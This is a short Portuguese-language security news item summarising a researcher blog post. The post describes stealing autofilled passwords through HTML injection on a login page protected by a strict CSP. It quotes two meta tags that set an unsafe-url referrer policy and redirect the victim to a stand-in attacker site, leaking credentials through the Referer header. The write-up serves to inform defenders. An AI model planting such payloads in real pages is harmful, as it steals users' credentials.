Roubo de senha via injeção de HTML sob um CSP rigoroso

A AFINE analisou um ataque a uma página de autenticação protegida por um CSP rigoroso. Scripts, estilos, imagens e solicitações externas foram bloqueados, tornando o XSS clássico impossível. No entanto, a injeção de HTML ainda estava disponível.

O invasor injeta um formulário contendo campos de email e senha. O gerenciador de senhas do navegador os preenche automaticamente com as credenciais armazenadas da vítima. Quando o usuário envia o formulário, as credenciais são enviadas via solicitação GET para o aplicativo legítimo e tornam-se parte da URL.

O desafio restante é a exfiltração. Como o CSP bloqueia solicitações diretas para domínios externos, o ataque abusa do cabeçalho Referer. O HTML injetado define uma política de referenciador permissiva e redireciona imediatamente a vítima para um site controlado pelo invasor:

<meta name="referrer" content="unsafe-url">
<meta http-equiv="Refresh" content="0;url=https://attacker.example">

Como resultado, o navegador segue o redirecionamento e inclui a URL completa da página anterior no cabeçalho Referer. Como essa URL contém as credenciais da vítima, elas são divulgadas ao invasor.

📎 Fonte: https://afine.com/blogs/stealing-passwords-via-html-injection-under-a-strict-csp